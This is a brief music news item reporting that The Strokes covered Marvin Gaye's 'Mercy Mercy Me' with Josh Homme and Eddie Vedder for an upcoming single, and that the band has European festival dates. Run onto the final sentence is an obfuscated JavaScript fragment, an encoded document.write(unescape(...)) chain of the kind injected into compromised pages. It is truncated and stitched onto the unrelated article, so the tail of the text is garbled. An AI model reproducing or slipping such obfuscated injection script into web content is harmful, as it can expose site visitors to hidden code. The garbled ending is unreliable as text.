The Strokes have recorded a cover version of Marvin Gaye's "Mercy Mercy Me" with Josh Homme and Eddie Vedder, according to reports.
The New York rock icons are expected to release their reworked version of the classic track, which is taken from Gaye's "What's Going On" LP, on their forthcoming single.
"You Only Live Once" is the third single to be taken from the current Strokes album "First Impressions Of Earth" and is due out in mid-July.
Pearl Jam's Vedder apparently shares vocals with Julian Casablancas on the track, while Queens Of The Stone Age's Homme plays drums alongside Fab Moretti, reports Billboard.
The Strokes are scheduled to play a host of European dates this summer, including the Wireless Festival in London and T In The Park in Scotland.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
